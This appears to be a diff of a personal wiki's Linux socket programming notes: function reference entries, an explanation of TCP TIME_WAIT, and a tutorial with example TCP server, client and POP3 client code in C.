20. sendto (send data through a socket)

Related functions: send, sendmsg, recv, recvfrom, socket

Header files: #include <sys/types.h>
#include <sys/socket.h>

Prototype: ssize_t sendto(int s, const void *msg, size_t len, int flags, const struct sockaddr *to, socklen_t tolen);

Description: sendto() sends data to the peer host through the socket s. s is a connected socket; with UDP no connection step is needed. msg points to the data to send and len is its length. flags is normally 0; for other values see send(). to gives the network address to send to; for struct sockaddr, see bind(). tolen is the size of the address structure.

Return value: the number of bytes actually sent on success; -1 on failure, with the cause stored in errno.

Error codes:
EBADF s is not a valid socket descriptor
EFAULT one of the pointer arguments points to inaccessible memory
ENOTSOCK s is a file descriptor, not a socket
EINTR interrupted by a signal
EAGAIN the operation would block, but the socket s is non-blocking
ENOBUFS not enough system buffer memory
EINVAL an argument passed to the system call is invalid

Example:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define PORT 2345 /* port to use */

int main(void)
{
    int sockfd;
    ssize_t len;
    struct sockaddr_in addr;
    socklen_t addr_len;
    char buffer[256];
    /* Create the socket */
    if ((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
        perror("socket");
        exit(1);
    }
    /* Fill in the sockaddr_in structure */
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    if (bind(sockfd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("bind");
        exit(1);
    }
    while (1) {
        addr_len = sizeof(addr);
        len = recvfrom(sockfd, buffer, sizeof(buffer), 0, (struct sockaddr *)&addr, &addr_len);
        if (len < 0) {
            perror("recvfrom");
            continue;
        }
        /* Show the client's network address */
        printf("receive from %s\n", inet_ntoa(addr.sin_addr));
        /* Send the string back to the client */
        sendto(sockfd, buffer, len, 0, (struct sockaddr *)&addr, addr_len);
    }
}

Run: see recvfrom().
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
21. setprotoent (open the network protocol data file)

Related functions: getprotobyname, getprotobynumber, endprotoent

Header files: #include <netdb.h>

Prototype: void setprotoent(int stayopen);

Description: setprotoent() opens /etc/protocols. If stayopen is 1, later calls to getprotobyname() or getprotobynumber() will not close the file automatically.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
22. setservent (open the host's network service data file)

Related functions: getservent, getservbyname, getservbyport, endservent

Header files: #include <netdb.h>

Prototype: void setservent(int stayopen);

Description: setservent() opens /etc/services. If stayopen is 1, later calls to getservbyname() or getservbyport() will not close the file automatically.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
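23. setsockopt (set socket options)

Related functions: getsockopt

Header files: #include <sys/types.h>
#include <sys/socket.h>

Prototype: int setsockopt(int s, int level, int optname, const void *optval, socklen_t optlen);

Description: setsockopt() sets an option on the socket s. level is the protocol layer the option belongs to; it is normally SOL_SOCKET, which addresses the socket layer. optname is the option to set and can be one of the following:
SO_DEBUG turn debugging mode on or off
SO_REUSEADDR allow the local address to be reused in bind()
SO_TYPE return the socket type (read with getsockopt())
SO_ERROR return the pending socket error (read with getsockopt())
SO_DONTROUTE send packets without going through routing
SO_BROADCAST allow sending broadcasts
SO_SNDBUF set the size of the send buffer
SO_RCVBUF set the size of the receive buffer
SO_KEEPALIVE periodically check whether the connection is still alive
SO_OOBINLINE leave received out-of-band data inline in the normal input data
SO_LINGER control whether close() waits until pending data has been sent

optval points to the value to set, and optlen is the length of optval.

Return value: 0 on success; -1 on error, with the cause stored in errno.

Error codes:
EBADF s is not a valid socket descriptor
ENOTSOCK s is a file descriptor, not a socket
ENOPROTOOPT the option given by optname is not valid
EFAULT optval points to inaccessible memory

Example: see getsockopt().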
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
24. shutdown (shut down socket communication)
Related functions: socket, connect
Header file: #include <sys/socket.h>
Prototype: int shutdown(int s, int how);
Description: shutdown() shuts down all or part of the connection on socket s. s is the descriptor of a connected socket, and how takes one of the following values:
how=0  stop receiving (SHUT_RD)
how=1  stop sending (SHUT_WR)
how=2  stop both receiving and sending (SHUT_RDWR)
Return value: 0 on success; -1 on failure, with the cause stored in errno.
Errors:
EBADF  s is not a valid descriptor
ENOTSOCK  s is a file descriptor, not a socket
ENOTCONN  the socket s is not connected
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
25. socket (create a socket for communication)
Related functions: accept, bind, connect, listen
Header files: #include <sys/types.h>
#include <sys/socket.h>
Prototype: int socket(int domain, int type, int protocol);
Description: socket() creates a new socket, that is, it asks the system to set up a communication endpoint. domain selects the address family; the complete list is defined in /usr/include/bits/socket.h. Common values:
PF_UNIX/PF_LOCAL/AF_UNIX/AF_LOCAL  UNIX inter-process communication
PF_INET/AF_INET  IPv4
PF_INET6/AF_INET6  IPv6
PF_IPX/AF_IPX  IPX (Novell)
PF_NETLINK/AF_NETLINK  kernel user interface device
PF_X25/AF_X25  ITU-T X.25 / ISO-8208
PF_AX25/AF_AX25  amateur radio AX.25
PF_ATMPVC/AF_ATMPVC  access to raw ATM PVCs
PF_APPLETALK/AF_APPLETALK  AppleTalk (DDP)
PF_PACKET/AF_PACKET  low-level packet interface
Parameter type takes one of the following values:
SOCK_STREAM  a sequenced, reliable, two-way byte stream, i.e. TCP. It supports the OOB mechanism, and the connection must be established with connect() before any data is transferred.
SOCK_DGRAM  connectionless, unreliable datagrams
SOCK_SEQPACKET  sequenced, reliable datagram connection
SOCK_RAW  raw network protocol access
SOCK_RDM  reliable datagrams
SOCK_PACKET  direct communication with the network driver
protocol gives the number of the transport protocol the socket uses; this parameter usually needs no attention and is set to 0.
Return value: the socket descriptor on success, -1 on failure.
Errors:
EPROTONOSUPPORT  the type or protocol is not supported within the given domain
ENFILE  not enough kernel memory to create a new socket structure
EMFILE  the process file table is full, so no new socket can be created
EACCES  permission to create a socket of the given type or protocol is denied
ENOBUFS/ENOMEM  not enough memory
EINVAL  domain, type or protocol is invalid
Example: see connect().
|
||||
26
Zim/Programme/APUE/Linux_网络编程之TIME_WAIT状态.txt
Normal file
@@ -0,0 +1,26 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-03T21:32:39+08:00
|
||||
|
||||
====== Linux 网络编程之TIME WAIT状态 ======
|
||||
Created 星期五 03 六月 2011
|
||||
http://blog.csdn.net/feiyinzilgd/archive/2010/09/19/5894446.aspx
|
||||
{{./TIME_WAIT.jpg}}
|
||||
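When I first looked at the four-step termination diagram for a TCP socket, I did not really understand the final TIME_WAIT state. Coming back to it now, I find TIME_WAIT quite subtle. It exists for two reasons:

* To let TCP's full-duplex connection terminate reliably.
* To let segments that are still in the network and addressed to the old connection be discarded, rather than delivered to a new connection.

Before going through the two reasons, we need the concept of MSL (maximum segment lifetime).

Every TCP implementation must choose an MSL. The value is commonly quoted as 2 minutes, but it is not fixed and differs between systems. Whether or not an error occurs or the connection is dropped, MSL is the longest time a segment may stay in the network. In other words, MSL is the segment's lifetime: a segment older than that is discarded instead of being delivered. TIME_WAIT lasts twice the MSL, i.e. 2MSL.

Reliable termination of the full-duplex connection

Terminating a TCP connection reliably takes four segments, as shown in the figure above. The client closes first, which sends a FIN to the server; the server replies with an ACK. The server then closes its side of the connection and sends its own FIN; the client answers with an ACK and enters TIME_WAIT. If the server does not receive that ACK, it retransmits its FIN, and because the client is still in TIME_WAIT it can send the ACK again. This guarantees that both ends know the other has finished. If the client had discarded the connection state instead of waiting in TIME_WAIT, its TCP would answer a retransmitted FIN with an RST, which the server would interpret as an error.

Discarding stray segments of the old connection so that a new connection does not receive them

An example:

Suppose a TCP connection A is established between 10.12.24.48 port 21 and 206.8.16.32 port 23 (it does not matter which end is the server), and A is then closed. A new TCP connection B is then established between the same two address and port pairs. A and B may well have been created by different applications. After A is closed, segments m that belong to A may still be in transit. Because B uses exactly the same addresses and ports as A, m would eventually be delivered to B's endpoints, and B would receive data that was meant for A. A connection in TIME_WAIT therefore forbids a new connection with the same address and port pairs (such as B after A) until TIME_WAIT ends, that is, until 2MSL has passed. One MSL lets segments still travelling toward the connection expire, and the other MSL lets the replies to them expire. After 2MSL, data arriving on the newly established connection cannot be data that was sent to the old one.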
|
||||
BIN
Zim/Programme/APUE/Linux_网络编程之TIME_WAIT状态/TIME_WAIT.jpg
Normal file
|
After Width: | Height: | Size: 29 KiB |
309
Zim/Programme/APUE/Linux下Socket编程.txt
Normal file
@@ -0,0 +1,309 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T15:20:36+08:00
|
||||
|
||||
====== Linux下Socket编程 ======
|
||||
Created 星期六 04 六月 2011
|
||||
http://www.kuqin.com/networkprog/20080512/8361.html
|
||||
什么是Socket
|
||||
Socket接口是TCP/IP网络的API,Socket接口定义了许多函数或例程,程序员可以用它们来开发TCP/IP网络上的应用程序。要学Internet上的TCP/IP网络编程,必须理解Socket接口。
|
||||
Socket接口设计者最先是将接口放在Unix操作系统里面的。如果了解Unix系统的输入和输出的话,就很容易了解Socket了。网络的 Socket数据传输是一种特殊的I/O,Socket也是一种文件描述符。Socket也具有一个类似于打开文件的函数调用Socket(),该函数返 回一个整型的Socket描述符,随后的连接建立、数据传输等操作都是通过该Socket实现的。常用的Socket类型有两种:流式Socket (SOCK_STREAM)和数据报式Socket(SOCK_DGRAM)。流式是一种面向连接的Socket,针对于面向连接的TCP服务应用;数据 报式Socket是一种无连接的Socket,对应于无连接的UDP服务应用。
|
||||
|
||||
Socket建立
|
||||
为了建立Socket,程序可以调用Socket函数,该函数返回一个类似于文件描述符的句柄。socket函数原型为:
|
||||
int socket(int domain, int type, int protocol);
|
||||
domain指明所使用的协议族,通常为PF_INET,表示互联网协议族(TCP/IP协议族);type参数指定socket的类型: SOCK_STREAM 或SOCK_DGRAM,Socket接口还定义了原始Socket(SOCK_RAW),允许程序使用低层协议;protocol通常赋值"0"。 Socket()调用返回一个整型socket描述符,你可以在后面的调用使用它。
|
||||
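A socket descriptor is a small integer that indexes an entry in the descriptor table, and that entry in turn refers to an internal data structure. When socket() is called, the socket implementation creates a socket; "creating a socket" really means allocating storage for a socket data structure. The implementation manages the descriptor table for you.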
|
||||
两个网络程序之间的一个网络连接包括五种信息:通信协议、本地协议地址、本地主机端口、远端主机地址和远端协议端口。Socket数据结构中包含这五种信息。
|
||||
|
||||
Socket配置
|
||||
通过socket调用返回一个socket描述符后,在使用socket进行网络传输以前,必须配置该socket。面向连接的socket客户端通过 调用Connect函数在socket数据结构中保存本地和远端信息。无连接socket的客户端和服务端以及面向连接socket的服务端通过调用 bind函数来配置本地信息。
|
||||
Bind函数将socket与本机上的一个端口相关联,随后你就可以在该端口监听服务请求。Bind函数原型为:
|
||||
int bind(int sockfd,struct sockaddr *my_addr, int addrlen);
|
||||
Sockfd是调用socket函数返回的socket描述符,my_addr是一个指向包含有本机IP地址及端口号等信息的sockaddr类型的指针;addrlen常被设置为sizeof(struct sockaddr)。
|
||||
struct sockaddr结构类型是用来保存socket信息的:
|
||||
struct sockaddr {
|
||||
unsigned short sa_family; /* 地址族, AF_xxx */
|
||||
char sa_data[14]; /* 14 字节的协议地址 */
|
||||
};
|
||||
sa_family一般为AF_INET,代表Internet(TCP/IP)地址族;sa_data则包含该socket的IP地址和端口号。
|
||||
另外还有一种结构类型:
|
||||
struct sockaddr_in {
|
||||
short int sin_family; /* 地址族 */
|
||||
unsigned short int sin_port; /* 端口号 */
|
||||
struct in_addr sin_addr; /* IP地址 */
|
||||
unsigned char sin_zero[8]; /* 填充0 以保持与struct sockaddr同样大小 */
|
||||
};
|
||||
这个结构更方便使用。sin_zero用来将sockaddr_in结构填充到与struct sockaddr同样的长度,可以用bzero()或memset()函数将其置为零。指向sockaddr_in 的指针和指向sockaddr的指针可以相互转换,这意味着如果一个函数所需参数类型是sockaddr时,你可以在函数调用的时候将一个指向 sockaddr_in的指针转换为指向sockaddr的指针;或者相反。
|
||||
使用bind函数时,可以用下面的赋值实现自动获得本机IP地址和随机获取一个没有被占用的端口号:
|
||||
my_addr.sin_port = 0; /* 系统随机选择一个未被使用的端口号 */
|
||||
my_addr.sin_addr.s_addr = INADDR_ANY; /* 填入本机IP地址 */
|
||||
通过将my_addr.sin_port置为0,函数会自动为你选择一个未占用的端口来使用。同样,通过将my_addr.sin_addr.s_addr置为INADDR_ANY,系统会自动填入本机IP地址。
|
||||
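Note that when calling bind(), sin_port must be converted to network byte order with htons(). sin_addr.s_addr must be in network byte order as well; INADDR_ANY is 0 and therefore identical in either order, which is why the assignment above works without conversion, but any other address constant needs htonl().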
|
||||
|
||||
|
||||
计算机数据存储有两种字节优先顺序:高位字节优先和低位字节优先。Internet上数据以高位字节优先顺序在网络上传输,所以对于在内部是以低位字节优先方式存储数据的机器,在Internet上传输数据时就需要进行转换,否则就会出现数据不一致。
|
||||
下面是几个字节顺序转换函数:
|
||||
·htonl():把32位值从主机字节序转换成网络字节序
|
||||
·htons():把16位值从主机字节序转换成网络字节序
|
||||
·ntohl():把32位值从网络字节序转换成主机字节序
|
||||
·ntohs():把16位值从网络字节序转换成主机字节序
|
||||
|
||||
//对于多字节的数据类型如整型、指针、浮点型等其一个值的多个字节若在两端存取的方式不一致就会导致错误,而字符串本身就一个字节故没有问题。
|
||||
另外
|
||||
|
||||
|
||||
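bind() returns 0 on success; on error it returns -1 and sets errno. When calling bind(), avoid port numbers below 1024: those are reserved (and normally require root privileges). Any unused port from 1024 upward can be chosen.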
|
||||
|
||||
连接建立
|
||||
面向连接的客户程序使用Connect函数来配置socket并与远端服务器建立一个TCP连接,其函数原型为:
|
||||
int connect(int sockfd, struct sockaddr *serv_addr,int addrlen);
|
||||
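sockfd is the socket descriptor returned by socket(); serv_addr points to a structure holding the remote host's IP address and port; addrlen is the length of that remote address structure. connect() returns -1 on error and sets errno accordingly. A client program does not need to call bind(): it only has to know the destination IP address, and it does not care which local port is used to reach the server. The socket implementation picks an unused port for the program automatically and notifies the program when data arrives on that port.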
|
||||
Connect函数启动和远端主机的直接连接。只有面向连接的客户程序使用socket时才需要将此socket与远端主机相连。无连接协议从不建立直接连接。面向连接的服务器也从不启动一个连接,它只是被动的在协议端口监听客户的请求。
|
||||
Listen函数使socket处于被动的监听模式,并为该socket建立一个输入数据队列,将到达的服务请求保存在此队列中,直到程序处理它们。
|
||||
int listen(int sockfd, int backlog);
|
||||
Sockfd 是Socket系统调用返回的socket 描述符;backlog指定在请求队列中允许的最大请求数,进入的连接请求将在队列中等待accept()它们(参考下文)。Backlog对队列中等待 服务的请求的数目进行了限制,大多数系统缺省值为20。如果一个服务请求到来时,输入队列已满,该socket将拒绝连接请求,客户将收到一个出错信息。
|
||||
当出现错误时listen函数返回-1,并置相应的errno错误码。
|
||||
accept()函数让服务器接收客户的连接请求。在建立好输入队列后,服务器就调用accept函数,然后睡眠并等待客户的连接请求。
|
||||
int accept(int sockfd, void *addr, int *addrlen);
|
||||
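sockfd is the listening socket descriptor. addr is usually a pointer to a sockaddr_in variable that receives information about the host requesting the connection (which host, from which port). addrlen is usually a pointer to an integer variable whose value is sizeof(struct sockaddr_in). On error accept() returns -1 and sets errno.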
|
||||
首先,当accept函数监视的 socket收到连接请求时,socket执行体将建立一个新的socket,执行体将这个新socket和请求连接进程的地址联系起来,收到服务请求的 初始socket仍可以继续在以前的 socket上监听,同时可以在新的socket描述符上进行数据传输操作。
|
||||
|
||||
数据传输
|
||||
Send()和recv()这两个函数用于面向连接的socket上进行数据传输。
|
||||
Send()函数原型为:
|
||||
int send(int sockfd, const void *msg, int len, int flags);
|
||||
Sockfd是你想用来传输数据的socket描述符;msg是一个指向要发送数据的指针;Len是以字节为单位的数据的长度;flags一般情况下置为0(关于该参数的用法可参照man手册)。
|
||||
Send()函数返回实际上发送出的字节数,可能会少于你希望发送的数据。在程序中应该将send()的返回值与欲发送的字节数进行比较。当send()返回值与len不匹配时,应该对这种情况进行处理。
|
||||
char *msg = "Hello!";
|
||||
int len, bytes_sent;
|
||||
……
|
||||
len = strlen(msg);
|
||||
bytes_sent = send(sockfd, msg,len,0);
|
||||
……
|
||||
recv()函数原型为:
|
||||
int recv(int sockfd,void *buf,int len,unsigned int flags);
|
||||
Sockfd是接受数据的socket描述符;buf 是存放接收数据的缓冲区;len是缓冲的长度。Flags也被置为0。Recv()返回实际上接收的字节数,当出现错误时,返回-1并置相应的errno值。
|
||||
Sendto()和recvfrom()用于在无连接的数据报socket方式下进行数据传输。由于本地socket并没有与远端机器建立连接,所以在发送数据时应指明目的地址。
|
||||
sendto()函数原型为:
|
||||
int sendto(int sockfd, const void *msg,int len,unsigned int flags,const struct sockaddr *to, int tolen);
|
||||
该函数比send()函数多了两个参数,to表示目地机的IP地址和端口号信息,而tolen常常被赋值为sizeof (struct sockaddr)。Sendto 函数也返回实际发送的数据字节长度或在出现发送错误时返回-1。
|
||||
Recvfrom()函数原型为:
|
||||
int recvfrom(int sockfd,void *buf,int len,unsigned int flags,struct sockaddr *from,int *fromlen);
|
||||
from是一个struct sockaddr类型的变量,该变量保存源机的IP地址及端口号。fromlen常置为sizeof (struct sockaddr)。当recvfrom()返回时,fromlen包含实际存入from中的数据字节数。Recvfrom()函数返回接收到的字节数或 当出现错误时返回-1,并置相应的errno。
|
||||
如果你对数据报socket调用了connect()函数时,你也可以利用send()和recv()进行数据传输,但该socket仍然是数据报socket,并且利用传输层的UDP服务。但在发送或接收数据报时,内核会自动为之加上目地和源地址信息。
|
||||
|
||||
结束传输
|
||||
当所有的数据操作结束以后,你可以调用close()函数来释放该socket,从而停止在该socket上的任何数据操作:
|
||||
close(sockfd);
|
||||
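You can also call shutdown() on the socket. It lets you stop data transfer in one direction only while transfer in the other direction continues. For example, you can shut down writing on a socket and still keep receiving on it until all incoming data has been read.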
|
||||
int shutdown(int sockfd,int how);
|
||||
Sockfd是需要关闭的socket的描述符。参数 how允许为shutdown操作选择以下几种方式:
|
||||
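·0 ------- further receives are disallowed
·1 ------- further sends are disallowed
·2 ------- further sends and receives are disallowed
·shutdown() does not release the descriptor itself; call close() for that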
|
||||
shutdown在操作成功时返回0,在出现错误时返回-1并置相应errno。
|
||||
|
||||
Socket编程实例
|
||||
代码实例中的服务器通过socket连接向客户端发送字符串"Hello, you are connected!"。只要在服务器上运行该服务器软件,在客户端运行客户软件,客户端就会收到该字符串。
|
||||
该服务器软件代码如下:
|
||||
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <strings.h>     /* bzero() */
#include <unistd.h>      /* fork(), close() */
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_ntoa() */
#include <sys/socket.h>
#include <sys/wait.h>
#define SERVPORT 3333 /* port the server listens on */
#define BACKLOG 10    /* maximum number of pending connection requests */
int main(void)
{
    int sockfd, client_fd;          /* sockfd: listening socket; client_fd: data socket */
    struct sockaddr_in my_addr;     /* local address */
    struct sockaddr_in remote_addr; /* client address */
    socklen_t sin_size;             /* size of remote_addr, updated by accept() */
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket creation failed"); exit(1);
    }
    my_addr.sin_family = AF_INET;
    my_addr.sin_port = htons(SERVPORT);
    my_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    bzero(&(my_addr.sin_zero), 8);
    if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) {
        perror("bind failed");
        exit(1);
    }
    if (listen(sockfd, BACKLOG) == -1) {
        perror("listen failed");
        exit(1);
    }
    while (1) {
        sin_size = sizeof(struct sockaddr_in);
        if ((client_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &sin_size)) == -1) {
            perror("accept failed");
            continue;
        }
        printf("received a connection from %s\n", inet_ntoa(remote_addr.sin_addr));
        if (!fork()) { /* child process */
            /* Note: 26 bytes excludes the string's '\0', so the receiver must append '\0' itself */
            if (send(client_fd, "Hello, you are connected!\n", 26, 0) == -1)
                perror("send failed");
            close(client_fd); /* this alone does not give the client EOF while the parent still holds client_fd */
            exit(0);
        }
        close(client_fd); /* required: the parent drops its copy of the descriptor */
    }
}
|
||||
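The server works as follows. It first calls socket() to create a socket, then calls bind() to bind it to the local address and a local port, then calls listen() to listen on that socket. When accept() receives a connection request, it produces a new socket. The server prints the client's IP address and sends the string "Hello, you are connected!" to the client through the new socket. Finally it closes that socket.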
|
||||
代码实例中的fork()函数生成一个子进程来处理数据传输部分,fork()语句对于子进程返回的值为0。所以包含fork函数的if语句是子进程代码部分,它与if语句后面的父进程代码部分是并发执行的。
|
||||
|
||||
客户端程序代码如下:
|
||||
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <strings.h>  /* bzero() */
#include <unistd.h>   /* close() */
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define SERVPORT 3333
#define MAXDATASIZE 100 /* maximum number of bytes transferred at a time */
int main(int argc, char *argv[]){
    int sockfd, recvbytes;
    char buf[MAXDATASIZE];
    struct hostent *host;
    struct sockaddr_in serv_addr;
    if (argc < 2) {
        fprintf(stderr,"Please enter the server's hostname!\n");
        exit(1);
    }
    if((host=gethostbyname(argv[1]))==NULL) { /* this function is obsolete; getaddrinfo() is normally used instead */
        herror("gethostbyname failed");
        exit(1);
    }
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("socket creation failed");
        exit(1);
    }
    serv_addr.sin_family=AF_INET;
    serv_addr.sin_port=htons(SERVPORT);
    serv_addr.sin_addr = *((struct in_addr *)host->h_addr);
    bzero(&(serv_addr.sin_zero),8);
    if (connect(sockfd, (struct sockaddr *)&serv_addr,
                sizeof(struct sockaddr)) == -1) {
        perror("connect failed");
        exit(1);
    }
    /* read at most MAXDATASIZE-1 bytes so there is room for the terminating '\0' */
    if ((recvbytes=recv(sockfd, buf, MAXDATASIZE-1, 0)) ==-1) {
        perror("recv failed");
        exit(1);
    }
    buf[recvbytes] = '\0';
    printf("Received: %s",buf);
    close(sockfd);
    return 0;
}
|
||||
客户端程序首先通过服务器域名获得服务器的IP地址,然后创建一个socket,调用connect函数与服务器建立连接,连接成功之后接收从服务器发送过来的数据,最后关闭socket。
|
||||
函数gethostbyname()是完成域名转换的。由于IP地址难以记忆和读写,所以为了方便,人们常常用域名来表示主机,这就需要进行域名和IP地址的转换。函数原型为:
|
||||
struct hostent *gethostbyname(const char *name);
|
||||
The function returns a pointer to a struct hostent, which is defined as follows:
struct hostent {
    char *h_name;       /* official name of the host */
    char **h_aliases;   /* NULL-terminated array of alias names */
    int h_addrtype;     /* address type; AF_INET on the Internet */
    int h_length;       /* length of an address in bytes */
    char **h_addr_list; /* NULL-terminated array of all addresses of the host */
};
#define h_addr h_addr_list[0] /* the first address in h_addr_list */
On success gethostbyname() returns a pointer to a struct hostent; on failure it returns NULL. Because gethostbyname() reports its error in h_errno rather than errno, the error message must be printed with herror() instead of perror().
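The client code above notes that gethostbyname() is obsolete and that getaddrinfo() is normally used instead. A minimal sketch of that replacement follows; it assumes IPv4 only, and resolve_ipv4 is a name made up for this example. The default host 127.0.0.1 and port 3333 are placeholders.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Hypothetical helper: resolve host/port to the first IPv4 stream address
 * and copy it into *out. Returns 0 on success, -1 on failure. */
int resolve_ipv4(const char *host, const char *port, struct sockaddr_in *out)
{
    struct addrinfo hints;
    struct addrinfo *res;
    int rc;

    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_INET;       /* IPv4 only, to match sockaddr_in */
    hints.ai_socktype = SOCK_STREAM; /* TCP */

    rc = getaddrinfo(host, port, &hints, &res);
    if (rc != 0) {
        /* getaddrinfo() has its own error codes; perror() does not apply */
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(rc));
        return -1;
    }
    memcpy(out, res->ai_addr, sizeof(*out));
    freeaddrinfo(res);
    return 0;
}

int main(int argc, char *argv[])
{
    const char *host = argc > 1 ? argv[1] : "127.0.0.1";
    struct sockaddr_in addr;

    if (resolve_ipv4(host, "3333", &addr) == -1)
        return 1;
    printf("%s -> %s port %d\n", host,
           inet_ntoa(addr.sin_addr), ntohs(addr.sin_port));
    return 0;
}
```

The resulting sockaddr_in can be passed to connect() directly; the port is already in network byte order.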
|
||||
|
||||
无连接的客户/服务器程序的在原理上和连接的客户/服务器是一样的,两者的区别在于无连接的客户/服务器中的客户一般不需要建立连接,而且在发送接收数据时,需要指定远端机的地址。
|
||||
|
||||
阻塞和非阻塞
|
||||
阻塞函数在完成其指定的任务以前不允许程序调用另一个函数。例如,程序执行一个读数据的函数调用时,在此函数完成读操作以前将不会执行下一程序语句。当 服务器运行到accept语句时,而没有客户连接服务请求到来,服务器就会停止在accept语句上等待连接服务请求的到来。这种情况称为阻塞 (blocking)。而非阻塞操作则可以立即完成。比如,如果你希望服务器仅仅注意检查是否有客户在等待连接,有就接受连接,否则就继续做其他事情,则 可以通过将Socket设置为非阻塞方式来实现。非阻塞socket在没有客户在等待时就使accept调用立即返回。
|
||||
#include <unistd.h>
|
||||
#include <fcntl.h>
|
||||
……
|
||||
sockfd = socket(AF_INET,SOCK_STREAM,0);
|
||||
fcntl(sockfd,F_SETFL,O_NONBLOCK);
|
||||
……
|
||||
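With sockets in non-blocking mode a program can "poll" several sockets. When it tries to read from a non-blocking socket that has no data waiting, the call returns immediately with -1 and errno set to EWOULDBLOCK. Polling of this kind keeps the CPU busy-waiting, which hurts performance and wastes system resources. select() solves the problem: the process suspends itself while the kernel watches a requested set of file descriptors, and as soon as there is activity on any of them select() returns and reports which descriptors are ready. The process is woken only when something has actually changed, instead of spending CPU time testing its inputs itself. The prototype of select() is: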
|
||||
int select(int numfds,fd_set *readfds,fd_set *writefds,
|
||||
fd_set *exceptfds,struct timeval *timeout);
|
||||
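readfds, writefds and exceptfds are the sets of file descriptors that select() watches for reading, writing and exceptional conditions. To find out whether data can be read from standard input and from some socket descriptor, add file descriptor 0 (standard input) and the corresponding sockfd to the readfds set. numfds is the highest-numbered descriptor to check plus 1; in this example it is sockfd+1. When select() returns, readfds has been modified to show which descriptors are ready for reading, and each one can be tested with FD_ISSET(). A set of macros sets, clears and tests the descriptors in an fd_set: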
|
||||
FD_ZERO(fd_set *set)----清除一个文件描述符集;
|
||||
FD_SET(int fd,fd_set *set)----将一个文件描述符加入文件描述符集中;
|
||||
FD_CLR(int fd,fd_set *set)----将一个文件描述符从文件描述符集中清除;
|
||||
FD_ISSET(int fd,fd_set *set)----试判断是否文件描述符被置位。
|
||||
Timeout参数是一个指向struct timeval类型的指针,它可以使select()在等待timeout长时间后没有文件描述符准备好即返回。struct timeval数据结构为:
|
||||
struct timeval {
|
||||
int tv_sec; /* seconds */
|
||||
int tv_usec; /* microseconds */
|
||||
};
|
||||
|
||||
POP3客户端实例
|
||||
下面的代码实例基于POP3的客户协议,与邮件服务器连接并取回指定用户帐号的邮件。与邮件服务器交互的命令存储在字符串数组POPMessage中,程序通过一个do-while循环依次发送这些命令。
|
||||
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <strings.h>  /* bzero() */
#include <unistd.h>   /* close() */
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define POP3SERVPORT 110
#define MAXDATASIZE 4096

int main(int argc, char *argv[]){
    int sockfd;
    struct hostent *host;
    struct sockaddr_in serv_addr;
    char *POPMessage[]={
        "USER userid\r\n",
        "PASS password\r\n",
        "STAT\r\n",
        "LIST\r\n",
        "RETR 1\r\n",
        "DELE 1\r\n",
        "QUIT\r\n",
        NULL
    };
    int iLength;
    int iMsg=0;
    int iEnd=0;
    char buf[MAXDATASIZE];

    if((host=gethostbyname("your.server"))==NULL) {
        herror("gethostbyname error"); /* gethostbyname() sets h_errno, not errno */
        exit(1);
    }
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("socket error");
        exit(1);
    }
    serv_addr.sin_family=AF_INET;
    serv_addr.sin_port=htons(POP3SERVPORT);
    serv_addr.sin_addr = *((struct in_addr *)host->h_addr);
    bzero(&(serv_addr.sin_zero),8);
    if (connect(sockfd, (struct sockaddr *)&serv_addr,sizeof(struct sockaddr))==-1){
        perror("connect error");
        exit(1);
    }

    do {
        send(sockfd,POPMessage[iMsg],strlen(POPMessage[iMsg]),0);
        printf("have sent: %s",POPMessage[iMsg]);

        /* keep one byte free for the terminating '\0' */
        iLength=recv(sockfd,buf+iEnd,sizeof(buf)-1-iEnd,0);
        if (iLength <= 0) break; /* error, connection closed, or buffer full */
        iEnd+=iLength;
        buf[iEnd]='\0';
        printf("received: %s,%d\n",buf,iMsg);

        iMsg++;
    } while (POPMessage[iMsg]);

    close(sockfd);
    return 0;
}
|
||||
|
||||
来自:Linux下Socket编程
|
||||
|
||||
1007
Zim/Programme/APUE/Linux下通用线程池的创建与使用.txt
Normal file
357
Zim/Programme/APUE/Linux程序库的构建和使用.txt
Normal file
@@ -0,0 +1,357 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-04-05T15:58:59+08:00
|
||||
|
||||
====== Linux程序库的构建和使用 ======
|
||||
Created Tuesday 05 April 2011
|
||||
|
||||
|
||||
http://php.lampbrother.net/html/42-1/1170.htm
|
||||
|
||||
在本文里,我们将探索与Linux的程序库有关的知识。首先,我们考察**静态库**的基本知识,并介绍如何使用__ar__命令来建立静态库。然后,我们将学习**共享库**方面的知识,并讲述可以**动态加载的共享库**的有关内容。
|
||||
|
||||
